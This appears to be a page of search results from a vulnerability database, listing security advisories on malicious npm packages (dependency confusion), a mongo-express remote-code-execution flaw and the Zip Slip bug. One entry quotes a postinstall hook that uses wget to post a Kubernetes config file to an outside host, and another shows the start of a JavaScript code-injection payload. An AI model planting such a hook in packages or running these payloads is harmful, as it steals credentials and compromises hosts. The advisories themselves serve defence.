Lucene search
K

12 matches found

Snyk
Snyk
added 2023/01/29 3:29 p.m.2 views

Malicious Package

Overview @playgami/portal-dynamic-copy is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if...

9.8CVSS7.1AI score
Exploits0References3
Snyk
Snyk
added 2022/07/27 8:7 a.m.3 views

Malicious Package

Overview docs-component-create-template is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if...

9.8CVSS7.1AI score
Exploits0References3
Snyk
Snyk
added 2022/07/27 8:7 a.m.2 views

Malicious Package

Overview core-support-bundler is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this...

9.8CVSS7.1AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2022/07/08 12:21 p.m.5 views

Malicious code in nexus-snyk-security-plugin (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware c9a9124035b1fe2f2161f9aac3e2da676b6ee8a964eba9fb37b209daec9b3c08 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

6.9AI score
Exploits0References1
Snyk
Snyk
added 2022/07/07 8:6 a.m.3 views

Malicious Package

Overview nexus-snyk-security-plugin is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if thi...

9.8CVSS7.1AI score
Exploits0References3
Snyk
Snyk
added 2022/07/04 8:8 a.m.2 views

Malicious Package

Overview zen-website is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this package was...

9.8CVSS7AI score
Exploits0References3
Snyk
Snyk
added 2022/06/23 9:24 a.m.3 views

Malicious Package

Overview workspace-hoist-all is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this packa...

9.8CVSS7AI score
Exploits0References3
Snyk
Snyk
added 2022/06/23 9:24 a.m.3 views

Malicious Package

Overview ssomicroservicefrontend is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this...

9.8CVSS7AI score
Exploits0References3
Snyk
Snyk
added 2022/06/23 9:24 a.m.1 views

Malicious Package

Overview logquery is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Note: This malicious package was uncovered by one of Snyk'...

9.8CVSS7.1AI score
Exploits0References3
Snyk
Snyk
added 2021/03/04 5:52 p.m.4 views

Malicious Package

Overview radar-cms is a malicious package. The package was found to have a post-install command which when executed will exfiltrate multiple files from a host machine. PoC "postinstall": "wget --post-file /.kube/config https://entfet95itcxpuu.m.pipedream.net;wget --post-file package.json...

9.6CVSS6.9AI score
Exploits0References2
Github Security Blog
Github Security Blog
added 2019/12/30 7:30 p.m.134 views

Remote Code Execution Vulnerability in NPM mongo-express

Impact Remote code execution on the host machine by any authenticated user. Proof Of Concept Launching mongo-express on a Mac, pasting the following into the "create index" field will pop open the Mac calculator: javascript this.constructor.constructor"return...

9.9CVSS9.4AI score0.84845EPSS
Exploits3References9Affected Software1
ThreatPost
ThreatPost
added 2018/06/06 8:58 p.m.16 views

Zip Slip Flaw Affects Thousands of Open-Source Projects

A known critical vulnerability has been given the moniker Zip Slip this week in an effort to raise awareness of its prevalence. A recent analysis shows the bug affects multiple open-source ecosystems, including JavaScript, Ruby, .NET and Go. As a result, thousands of developer projects, including...

0.4AI score
Exploits0References5
Rows per page
Query Builder